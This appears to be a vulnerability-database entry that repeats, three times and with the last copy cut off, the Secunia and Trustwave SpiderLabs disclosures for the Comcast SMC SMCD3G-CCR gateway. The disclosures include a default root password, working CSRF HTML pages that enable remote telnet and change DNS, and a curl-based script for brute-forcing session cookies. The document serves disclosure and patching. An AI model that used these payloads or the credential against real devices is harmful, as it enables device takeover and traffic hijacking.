TITLE:
SMC SMCD3G-CCR Two Vulnerabilities
SECUNIA ADVISORY ID:
SA43199
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/43199/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=43199
RELEASE DATE:
2011-03-05
DISCUSS ADVISORY:
http://secunia.com/advisories/43199/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/43199/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=43199
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
Two vulnerabilities have been reported in SMC SMCD3G-CCR, which can
be exploited by malicious people to conduct brute force and
cross-site request forgery attacks.
1) The web management application generates session identifiers
incrementally, which can be exploited to brute force a valid session
identifier via the "userid" cookie.
2) The web management application allows users to perform certain
actions via HTTP requests without making proper validity checks to
verify the requests. This can be exploited to e.g. enable management
via Telnet by tricking an administrator into visiting a malicious web
site while being logged-in to the application.
SOLUTION:
Reportedly fixed in firmware version 1.4.0.49.2.
PROVIDED AND/OR DISCOVERED BY:
Zack Fasel and Matthew Jakubowski, Trustwave's SpiderLabs.
ORIGINAL ADVISORY:
Trustwave's SpiderLabs (TWSL2011-002):
https://www.trustwave.com/spiderlabs/advisories/TWSL2011-002.txt
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
. Trustwave's SpiderLabs Security Advisory TWSL2011-001:
Vulnerabilities in Comcast DOCSIS 3.0 Business Gateways
(SMCD3G-CCR)
https://www.trustwave.com/spiderlabs/advisories/TWSL2011-002.txt
Published: 2011-02-04
Version: 1.0
Vendor: Comcast (http://comcast.com) and SMC (http://www.smc.com)
Product: Comcast DOCSIS 3.0 Business Gateway - SMCD3G-CCR
Version affected: Versions prior to 1.4.0.49.2
Product description:
The Comcast DOCSIS 3.0 Business Gateway provides end-user termination of
cable internet services for Comcast Business Class customers with enhanced
services including Network Address Translation (NAT), firewalling, and
Virtual Private Network (VPN) termination.
Credit: Zack Fasel and Matthew Jakubowski of Trustwave's SpiderLabs
Finding 1: Static Credentials
CVE: CVE-2011-0885
All SMCD3G-CCR gateways provided by Comcast have an administrative
login of "mso" with the password of "D0nt4g3tme". These passwords
are not provided as a part of the installation of the device and are
not recommended to be changed, thus the majority of users are unaware
of the default configuration.
With these default credentials, internal attackers can modify device
configurations to leverage more significant attacks, including redirection
of DNS requests, creation of a remote VPN termination point, and
modification of NAT entries. These credentials provide access to the web
interface for management, as well as a telnet interface that provides shell
access to the device. The mso login provides shell as UID 0 (root).
Finding 2: Cross Site Request Forgery (CSRF)
CVE: CVE-2011-0886
SMCD3G-CCR gateways provided by Comcast permit CSRF attacks against
numerous management pages allowing an attacker to embed in a webpage a
malicious request against the gateway's management interface. Through
this, an attacker can modify device configuration and enable remote
administration via a telnet shell and http.
The following Proof of Concept (PoC) connects to the gateway, logs in,
modifies the remote administration to allow any user to connect externally,
and modifies the DNS information.
## smcd3g-csrf-poc.htm
<html>
<body>
<iframe src="./smcd3g-csrf-poc-1.htm" width="1" height="1">
</iframe>
<iframe src="./smcd3g-csrf-poc-2.htm" width="1" height="1">
</iframe>
<iframe src="./smcd3g-csrf-poc-3.htm" width="1" height="1">
</iframe> </body> </html>
## smcd3g-csrf-poc-1.htm
<html>
<body>
<form action="http://10.1.10.1/goform/login" method="post"
name="tF">
<input type="hidden" name="user" value="mso" />
<input type="hidden" name="pws" value="D0nt4g3tme" />
</form> <script> document.tF.submit(); </script> </body>
</html>
## smcd3g-csrf-poc-2.htm
<html>
<body>
<form action="http://10.1.10.1/goform/RemoteRange"
name="RMangement" method="post"> <input type="hidden"
value="feat-admin-remote" name="file"> <input type="hidden"
value="admin/" name="dir"> <input type="hidden"
name="RemoteRange" value="0" /> <input type="hidden"
name="rm_access" value="on" /> <input type="hidden"
name="Remote0" value="0.0.0.0,0.0.0.0,1" /> <input
type="hidden" name="http_port" value="8080" /> <input
type="hidden" name="http_enable" value="on" /> <input
type="hidden" name="http_flag" value="1" /> <input
type="hidden" name="msoremote_enableCheck" value="on" />
<input type="hidden" name="mso_remote_enable" value="1" />
<input type="hidden" name="remote_enable" value="0" />
<input type="hidden" name="https_enable" value="on" />
<input type="hidden" name="https_port" value="8181" />
<input type="hidden" name="https_flag" value="1" /> <input
type="hidden" name="telnet_enable" value="on" /> <input
type="hidden" name="telnet_port" value="2323" /> <input
type="hidden" name="telnet_flag" value="1" /> <input
type="hidden" name="Remote1=" value="" /> </form> </body>
</html> <script>
setTimeout("document.RMangement.submit()",4000);
</script>
</body>
</html>
## smcd3g-csrf-poc-3.htm
<html>
<body>
<form name="WanIPform"
action="http://10.1.10.1/goform/Basic" method="post"> <input
type="hidden" value="feat-wan-ip" name="file"> <input
type="hidden" value="admin/" name="dir"> <input
type="hidden" value="Fixed" name="DNSAssign"> <input
type="hidden" value="0" name="dhcpc_release"> <input
type="hidden" value="0" name="dhcpc_renew"> <input
type="hidden" value="" name="domain_name"> <input
type="hidden" value="" name="WDn"> <input type="hidden"
name="SysName" value="" /> <input type="hidden"
name="manual_dns_enable" value="on" /> <input type="hidden"
name="DAddr" value="4.2.2.1" /> <input type="hidden"
name="DAddr0" value="4" /> <input type="hidden"
name="DAddr1" value="2" /> <input type="hidden"
name="DAddr2" value="2" /> <input type="hidden"
name="DAddr3" value="1" /> <input type="hidden"
name="PDAddr" value="4.2.2.2" /> <input type="hidden"
name="PDAddr0" value="4" /> <input type="hidden"
name="PDAddr1" value="2" /> <input type="hidden"
name="PDAddr2" value="2" /> <input type="hidden"
name="PDAddr3" value="2" /> </form> <script>
setTimeout("document.WanIPform.submit()",5000);
</script>
</body>
</html>
If the PoC was embedded in any web page the targeted user visited while
logged into the device, the attacker would be provided remote
administration in to the gateway device include a telnet shell. This would
allow the attacker to redirect traffic to a malicious end-point.
Finding 3: Weak Session Management
CVE: CVE-2011-0887
SMCD3G-CCR gateways provided by Comcast utilize a predictable value to
validate the active web management portal session. The epoch time of
beginning of the session is stored as a cookie labeled "userid". This
provides a predictable range of session IDs that can be brute-forced.
The following PoC attempts to brute force the session IDs by requesting the
admin page with an incrementing cookie and determining whether it wants to
redirect to login.asp.
## smcd3g-session-poc.sh
#!/bin/bash
start=1267604160
end=1267605960
for (( i=$start; i<=$end; i++)) do if [ `curl -sb userid=$i
http://10.1.10.1/admin/index.asp | grep -c login.asp` -lt
"1" ] then echo "Session ID Found: $i"
fi
if [ $(($i % 100)) -eq "0" ]
then echo "Currently at $i"
fi
done
Through this, an attacker can brute-force the possible valid session IDs.
Sessions do by default expire within 10 minutes, thus the attack window is
limited but can be leveraged with other attack methods.
Vendor Response:
These issues have been addressed as of version 1.4.0.49.2
Remediation Steps:
In order to determine if the correct version is installed, users should
view the "About" link in the management interface. Versions 1.4.0.49.2 and
above have been corrected.
Vendor Communication Timeline:
08/30/10 - Vulnerability disclosed
01/21/11 - Patch Released
02/04/11 - Advisory Published
Revision History:
1.0 Initial publication
References
1. http://www.smc.com/index.cfm?event=viewProduct&pid=1678
About Trustwave:
Trustwave is the leading provider of on-demand and subscription-based
information security and payment card industry compliance management
solutions to businesses and government entities throughout the world. For
organizations faced with today's challenging data security and compliance
environment, Trustwave provides a unique approach with comprehensive
solutions that include its flagship TrustKeeper compliance management
software and other proprietary security solutions. Trustwave has helped
thousands of organizations--ranging from Fortune 500 businesses and large
financial institutions to small and medium-sized retailers--manage
compliance and secure their network infrastructure, data communications and
critical information assets. Trustwave is headquartered in Chicago with
offices throughout North America, South America, Europe, Africa, China and
Australia. For more information, visit https://www.trustwave.com
About Trustwave's SpiderLabs:
SpiderLabs(R) is the advanced security team at Trustwave focused on
application security, incident response, penetration testing, physical
security and security research. The team has performed over a thousand
incident investigations, thousands of penetration tests and hundreds of
application security tests globally. In addition, the SpiderLabs Research
team provides intelligence through bleeding-edge research and proof of
concept tool development to enhance Trustwave's products and services.
https://www.trustwave.com/spiderlabs
Disclaimer:
The information provided in this advisory is provided "as is" without
warranty of any kind. Trustwave disclaims all warranties, either express or
implied, including the warranties of merchantability and fitness for a
particular purpose. In no event shall Trustwave or its suppliers be liable
for any damages whatsoever including direct, indirect, incidental,
consequential, loss of business profits or special damages, even if
Trustwave or its suppliers have been advised of the possibility of such
damages. Some states do not allow the exclusion or limitation of liability
for consequential or incidental damages so the foregoing limitation may not
apply.
This transmission may contain information that is privileged, confidential, and/or exempt from disclosure under applicable law. If you are not the intended recipient, you are hereby notified that any disclosure, copying, distribution, or use of the information contained herein (including any reliance thereon) is STRICTLY PROHIBITED. If you received this transmission in error, please immediately contact the sender and destroy the material in its entirety, whether in electronic or hard copy format.
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
| VAR-201102-0085 | CVE-2011-0887 | SMC SMCD3G-CCR of Web Management portal Vulnerable to session hijacking |
CVSS V2: 4.3 CVSS V3: - Severity: MEDIUM |
The web management portal on the SMC SMCD3G-CCR (aka Comcast Business Gateway) with firmware before 1.4.0.49.2 uses predictable session IDs based on time values, which makes it easier for remote attackers to hijack sessions via a brute-force attack on the userid cookie. Comcast DOCSIS is prone to multiple cross-site request-forgery and security-bypass vulnerabilities in business gateways.
Exploiting these issues may allow a remote attacker to perform certain administrative actions, bypass certain security restrictions, gain unauthorized access to the affected device, or delete certain data. Other attacks are also possible.
Comcast DOCSIS 3.0 is vulnerable; other versions may also be affected. ----------------------------------------------------------------------
Get a tax break on purchases of Secunia Solutions!
If you are a U.S. company, you may be qualified for a tax break for your software purchases. Learn more at:
http://secunia.com/products/corporate/vim/section_179/
----------------------------------------------------------------------
TITLE:
SMC SMCD3G-CCR Two Vulnerabilities
SECUNIA ADVISORY ID:
SA43199
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/43199/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=43199
RELEASE DATE:
2011-03-05
DISCUSS ADVISORY:
http://secunia.com/advisories/43199/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/43199/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=43199
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
Two vulnerabilities have been reported in SMC SMCD3G-CCR, which can
be exploited by malicious people to conduct brute force and
cross-site request forgery attacks.
2) The web management application allows users to perform certain
actions via HTTP requests without making proper validity checks to
verify the requests. This can be exploited to e.g. enable management
via Telnet by tricking an administrator into visiting a malicious web
site while being logged-in to the application.
SOLUTION:
Reportedly fixed in firmware version 1.4.0.49.2.
PROVIDED AND/OR DISCOVERED BY:
Zack Fasel and Matthew Jakubowski, Trustwave's SpiderLabs.
ORIGINAL ADVISORY:
Trustwave's SpiderLabs (TWSL2011-002):
https://www.trustwave.com/spiderlabs/advisories/TWSL2011-002.txt
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
. Trustwave's SpiderLabs Security Advisory TWSL2011-001:
Vulnerabilities in Comcast DOCSIS 3.0 Business Gateways
(SMCD3G-CCR)
https://www.trustwave.com/spiderlabs/advisories/TWSL2011-002.txt
Published: 2011-02-04
Version: 1.0
Vendor: Comcast (http://comcast.com) and SMC (http://www.smc.com)
Product: Comcast DOCSIS 3.0 Business Gateway - SMCD3G-CCR
Version affected: Versions prior to 1.4.0.49.2
Product description:
The Comcast DOCSIS 3.0 Business Gateway provides end-user termination of
cable internet services for Comcast Business Class customers with enhanced
services including Network Address Translation (NAT), firewalling, and
Virtual Private Network (VPN) termination.
Credit: Zack Fasel and Matthew Jakubowski of Trustwave's SpiderLabs
Finding 1: Static Credentials
CVE: CVE-2011-0885
All SMCD3G-CCR gateways provided by Comcast have an administrative
login of "mso" with the password of "D0nt4g3tme". These passwords
are not provided as a part of the installation of the device and are
not recommended to be changed, thus the majority of users are unaware
of the default configuration.
With these default credentials, internal attackers can modify device
configurations to leverage more significant attacks, including redirection
of DNS requests, creation of a remote VPN termination point, and
modification of NAT entries. These credentials provide access to the web
interface for management, as well as a telnet interface that provides shell
access to the device. The mso login provides shell as UID 0 (root).
Finding 2: Cross Site Request Forgery (CSRF)
CVE: CVE-2011-0886
SMCD3G-CCR gateways provided by Comcast permit CSRF attacks against
numerous management pages allowing an attacker to embed in a webpage a
malicious request against the gateway's management interface. Through
this, an attacker can modify device configuration and enable remote
administration via a telnet shell and http.
The following Proof of Concept (PoC) connects to the gateway, logs in,
modifies the remote administration to allow any user to connect externally,
and modifies the DNS information.
## smcd3g-csrf-poc.htm
<html>
<body>
<iframe src="./smcd3g-csrf-poc-1.htm" width="1" height="1">
</iframe>
<iframe src="./smcd3g-csrf-poc-2.htm" width="1" height="1">
</iframe>
<iframe src="./smcd3g-csrf-poc-3.htm" width="1" height="1">
</iframe> </body> </html>
## smcd3g-csrf-poc-1.htm
<html>
<body>
<form action="http://10.1.10.1/goform/login" method="post"
name="tF">
<input type="hidden" name="user" value="mso" />
<input type="hidden" name="pws" value="D0nt4g3tme" />
</form> <script> document.tF.submit(); </script> </body>
</html>
## smcd3g-csrf-poc-2.htm
<html>
<body>
<form action="http://10.1.10.1/goform/RemoteRange"
name="RMangement" method="post"> <input type="hidden"
value="feat-admin-remote" name="file"> <input type="hidden"
value="admin/" name="dir"> <input type="hidden"
name="RemoteRange" value="0" /> <input type="hidden"
name="rm_access" value="on" /> <input type="hidden"
name="Remote0" value="0.0.0.0,0.0.0.0,1" /> <input
type="hidden" name="http_port" value="8080" /> <input
type="hidden" name="http_enable" value="on" /> <input
type="hidden" name="http_flag" value="1" /> <input
type="hidden" name="msoremote_enableCheck" value="on" />
<input type="hidden" name="mso_remote_enable" value="1" />
<input type="hidden" name="remote_enable" value="0" />
<input type="hidden" name="https_enable" value="on" />
<input type="hidden" name="https_port" value="8181" />
<input type="hidden" name="https_flag" value="1" /> <input
type="hidden" name="telnet_enable" value="on" /> <input
type="hidden" name="telnet_port" value="2323" /> <input
type="hidden" name="telnet_flag" value="1" /> <input
type="hidden" name="Remote1=" value="" /> </form> </body>
</html> <script>
setTimeout("document.RMangement.submit()",4000);
</script>
</body>
</html>
## smcd3g-csrf-poc-3.htm
<html>
<body>
<form name="WanIPform"
action="http://10.1.10.1/goform/Basic" method="post"> <input
type="hidden" value="feat-wan-ip" name="file"> <input
type="hidden" value="admin/" name="dir"> <input
type="hidden" value="Fixed" name="DNSAssign"> <input
type="hidden" value="0" name="dhcpc_release"> <input
type="hidden" value="0" name="dhcpc_renew"> <input
type="hidden" value="" name="domain_name"> <input
type="hidden" value="" name="WDn"> <input type="hidden"
name="SysName" value="" /> <input type="hidden"
name="manual_dns_enable" value="on" /> <input type="hidden"
name="DAddr" value="4.2.2.1" /> <input type="hidden"
name="DAddr0" value="4" /> <input type="hidden"
name="DAddr1" value="2" /> <input type="hidden"
name="DAddr2" value="2" /> <input type="hidden"
name="DAddr3" value="1" /> <input type="hidden"
name="PDAddr" value="4.2.2.2" /> <input type="hidden"
name="PDAddr0" value="4" /> <input type="hidden"
name="PDAddr1" value="2" /> <input type="hidden"
name="PDAddr2" value="2" /> <input type="hidden"
name="PDAddr3" value="2" /> </form> <script>
setTimeout("document.WanIPform.submit()",5000);
</script>
</body>
</html>
If the PoC was embedded in any web page the targeted user visited while
logged into the device, the attacker would be provided remote
administration in to the gateway device include a telnet shell. This would
allow the attacker to redirect traffic to a malicious end-point.
Finding 3: Weak Session Management
CVE: CVE-2011-0887
SMCD3G-CCR gateways provided by Comcast utilize a predictable value to
validate the active web management portal session. The epoch time of
beginning of the session is stored as a cookie labeled "userid". This
provides a predictable range of session IDs that can be brute-forced.
The following PoC attempts to brute force the session IDs by requesting the
admin page with an incrementing cookie and determining whether it wants to
redirect to login.asp.
## smcd3g-session-poc.sh
#!/bin/bash
start=1267604160
end=1267605960
for (( i=$start; i<=$end; i++)) do if [ `curl -sb userid=$i
http://10.1.10.1/admin/index.asp | grep -c login.asp` -lt
"1" ] then echo "Session ID Found: $i"
fi
if [ $(($i % 100)) -eq "0" ]
then echo "Currently at $i"
fi
done
Through this, an attacker can brute-force the possible valid session IDs.
Sessions do by default expire within 10 minutes, thus the attack window is
limited but can be leveraged with other attack methods.
Vendor Response:
These issues have been addressed as of version 1.4.0.49.2
Remediation Steps:
In order to determine if the correct version is installed, users should
view the "About" link in the management interface. Versions 1.4.0.49.2 and
above have been corrected.
Vendor Communication Timeline:
08/30/10 - Vulnerability disclosed
01/21/11 - Patch Released
02/04/11 - Advisory Published
Revision History:
1.0 Initial publication
References
1. http://www.smc.com/index.cfm?event=viewProduct&pid=1678
About Trustwave:
Trustwave is the leading provider of on-demand and subscription-based
information security and payment card industry compliance management
solutions to businesses and government entities throughout the world. For
organizations faced with today's challenging data security and compliance
environment, Trustwave provides a unique approach with comprehensive
solutions that include its flagship TrustKeeper compliance management
software and other proprietary security solutions. Trustwave has helped
thousands of organizations--ranging from Fortune 500 businesses and large
financial institutions to small and medium-sized retailers--manage
compliance and secure their network infrastructure, data communications and
critical information assets. Trustwave is headquartered in Chicago with
offices throughout North America, South America, Europe, Africa, China and
Australia. For more information, visit https://www.trustwave.com
About Trustwave's SpiderLabs:
SpiderLabs(R) is the advanced security team at Trustwave focused on
application security, incident response, penetration testing, physical
security and security research. The team has performed over a thousand
incident investigations, thousands of penetration tests and hundreds of
application security tests globally. In addition, the SpiderLabs Research
team provides intelligence through bleeding-edge research and proof of
concept tool development to enhance Trustwave's products and services.
https://www.trustwave.com/spiderlabs
Disclaimer:
The information provided in this advisory is provided "as is" without
warranty of any kind. Trustwave disclaims all warranties, either express or
implied, including the warranties of merchantability and fitness for a
particular purpose. In no event shall Trustwave or its suppliers be liable
for any damages whatsoever including direct, indirect, incidental,
consequential, loss of business profits or special damages, even if
Trustwave or its suppliers have been advised of the possibility of such
damages. Some states do not allow the exclusion or limitation of liability
for consequential or incidental damages so the foregoing limitation may not
apply.
This transmission may contain information that is privileged, confidential, and/or exempt from disclosure under applicable law. If you are not the intended recipient, you are hereby notified that any disclosure, copying, distribution, or use of the information contained herein (including any reliance thereon) is STRICTLY PROHIBITED. If you received this transmission in error, please immediately contact the sender and destroy the material in its entirety, whether in electronic or hard copy format.
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
| VAR-201102-0083 | CVE-2011-0885 | SMC SMCD3G-CCR of specific Comcast Business Gateway Vulnerabilities that gain management access in settings |
CVSS V2: 10.0 CVSS V3: - Severity: HIGH |
A certain Comcast Business Gateway configuration of the SMC SMCD3G-CCR with firmware before 1.4.0.49.2 has a default password of D0nt4g3tme for the mso account, which makes it easier for remote attackers to obtain administrative access via the (1) web interface or (2) TELNET interface. Comcast DOCSIS is prone to multiple cross-site request-forgery and security-bypass vulnerabilities in business gateways.
Exploiting these issues may allow a remote attacker to perform certain administrative actions, bypass certain security restrictions, gain unauthorized access to the affected device, or delete certain data. Other attacks are also possible.
Comcast DOCSIS 3.0 is vulnerable; other versions may also be affected. ----------------------------------------------------------------------
Get a tax break on purchases of Secunia Solutions!
If you are a U.S. company, you may be qualified for a tax break for your software purchases. Learn more at:
http://secunia.com/products/corporate/vim/section_179/
----------------------------------------------------------------------
TITLE:
SMC SMCD3G-CCR Two Vulnerabilities
SECUNIA ADVISORY ID:
SA43199
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/43199/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=43199
RELEASE DATE:
2011-03-05
DISCUSS ADVISORY:
http://secunia.com/advisories/43199/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/43199/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=43199
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
Two vulnerabilities have been reported in SMC SMCD3G-CCR, which can
be exploited by malicious people to conduct brute force and
cross-site request forgery attacks.
1) The web management application generates session identifiers
incrementally, which can be exploited to brute force a valid session
identifier via the "userid" cookie.
2) The web management application allows users to perform certain
actions via HTTP requests without making proper validity checks to
verify the requests. This can be exploited to e.g. enable management
via Telnet by tricking an administrator into visiting a malicious web
site while being logged-in to the application.
SOLUTION:
Reportedly fixed in firmware version 1.4.0.49.2.
PROVIDED AND/OR DISCOVERED BY:
Zack Fasel and Matthew Jakubowski, Trustwave's SpiderLabs.
ORIGINAL ADVISORY:
Trustwave's SpiderLabs (TWSL2011-002):
https://www.trustwave.com/spiderlabs/advisories/TWSL2011-002.txt
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
. Trustwave's SpiderLabs Security Advisory TWSL2011-001:
Vulnerabilities in Comcast DOCSIS 3.0 Business Gateways
(SMCD3G-CCR)
https://www.trustwave.com/spiderlabs/advisories/TWSL2011-002.txt
Published: 2011-02-04
Version: 1.0
Vendor: Comcast (http://comcast.com) and SMC (http://www.smc.com)
Product: Comcast DOCSIS 3.0 Business Gateway - SMCD3G-CCR
Version affected: Versions prior to 1.4.0.49.2
Product description:
The Comcast DOCSIS 3.0 Business Gateway provides end-user termination of
cable internet services for Comcast Business Class customers with enhanced
services including Network Address Translation (NAT), firewalling, and
Virtual Private Network (VPN) termination.
Credit: Zack Fasel and Matthew Jakubowski of Trustwave's SpiderLabs
Finding 1: Static Credentials
CVE: CVE-2011-0885
All SMCD3G-CCR gateways provided by Comcast have an administrative
login of "mso" with the password of "D0nt4g3tme". These passwords
are not provided as a part of the installation of the device and are
not recommended to be changed, thus the majority of users are unaware
of the default configuration.
With these default credentials, internal attackers can modify device
configurations to leverage more significant attacks, including redirection
of DNS requests, creation of a remote VPN termination point, and
modification of NAT entries. These credentials provide access to the web
interface for management, as well as a telnet interface that provides shell
access to the device. The mso login provides shell as UID 0 (root).
Finding 2: Cross Site Request Forgery (CSRF)
CVE: CVE-2011-0886
SMCD3G-CCR gateways provided by Comcast permit CSRF attacks against
numerous management pages allowing an attacker to embed in a webpage a
malicious request against the gateway's management interface. Through
this, an attacker can modify device configuration and enable remote
administration via a telnet shell and http.
The following Proof of Concept (PoC) connects to the gateway, logs in,
modifies the remote administration to allow any user to connect externally,
and modifies the DNS information.
## smcd3g-csrf-poc.htm
<html>
<body>
<iframe src="./smcd3g-csrf-poc-1.htm" width="1" height="1">
</iframe>
<iframe src="./smcd3g-csrf-poc-2.htm" width="1" height="1">
</iframe>
<iframe src="./smcd3g-csrf-poc-3.htm" width="1" height="1">
</iframe> </body> </html>
## smcd3g-csrf-poc-1.htm
<html>
<body>
<form action="http://10.1.10.1/goform/login" method="post"
name="tF">
<input type="hidden" name="user" value="mso" />
<input type="hidden" name="pws" value="D0nt4g3tme" />
</form> <script> document.tF.submit(); </script> </body>
</html>
## smcd3g-csrf-poc-2.htm
<html>
<body>
<form action="http://10.1.10.1/goform/RemoteRange"
name="RMangement" method="post"> <input type="hidden"
value="feat-admin-remote" name="file"> <input type="hidden"
value="admin/" name="dir"> <input type="hidden"
name="RemoteRange" value="0" /> <input type="hidden"
name="rm_access" value="on" /> <input type="hidden"
name="Remote0" value="0.0.0.0,0.0.0.0,1" /> <input
type="hidden" name="http_port" value="8080" /> <input
type="hidden" name="http_enable" value="on" /> <input
type="hidden" name="http_flag" value="1" /> <input
type="hidden" name="msoremote_enableCheck" value="on" />
<input type="hidden" name="mso_remote_enable" value="1" />
<input type="hidden" name="remote_enable" value="0" />
<input type="hidden" name="https_enable" value="on" />
<input type="hidden" name="https_port" value="8181" />
<input type="hidden" name="https_flag" value="1" /> <input
type="hidden" name="telnet_enable" value="on" /> <input
type="hidden" name="telnet_port" value="2323" /> <input
type="hidden" name="telnet_flag" value="1" /> <input
type="hidden" name="Remote1=" value="" /> </form> </body>
</html> <script>
setTimeout("document.RMangement.submit()",4000);
</script>
</body>
</html>
## smcd3g-csrf-poc-3.htm
<html>
<body>
<form name="WanIPform"
action="http://10.1.10.1/goform/Basic" method="post"> <input
type="hidden" value="feat-wan-ip" name="file"> <input
type="hidden" value="admin/" name="dir"> <input
type="hidden" value="Fixed" name="DNSAssign"> <input
type="hidden" value="0" name="dhcpc_release"> <input
type="hidden" value="0" name="dhcpc_renew"> <input
type="hidden" value="" name="domain_name"> <input
type="hidden" value="" name="WDn"> <input type="hidden"
name="SysName" value="" /> <input type="hidden"
name="manual_dns_enable" value="on" /> <input type="hidden"
name="DAddr" value="4.2.2.1" /> <input type="hidden"
name="DAddr0" value="4" /> <input type="hidden"
name="DAddr1" value="2" /> <input type="hidden"
name="DAddr2" value="2" /> <input type="hidden"
name="DAddr3" value="1" /> <input type="hidden"
name="PDAddr" value="4.2.2.2" /> <input type="hidden"
name="PDAddr0" value="4" /> <input type="hidden"
name="PDAddr1" value="2" /> <input type="hidden"
name="PDAddr2" value="2" /> <input type="hidden"
name="PDAddr3" value="2" /> </form> <script>
setTimeout("document.WanIPform.submit()",5000);
</script>
</body>
</html>
If the PoC was embedded in any web page the targeted user visited while
logged into the device, the attacker would be provided remote
administration in to the gateway device include a telnet shell. This would
allow the attacker to redirect traffic to a malicious end-point.
Finding 3: Weak Session Management
CVE: CVE-2011-0887
SMCD3G-CCR gateways provided by Comcast utilize a predictable value to
validate the active web management portal session. The epoch time of
beginning of the session is stored as a cookie labeled "userid". This
provides a predictable range of session IDs that can be brute-forced.
The following PoC attempts to brute force the session IDs by requesting the
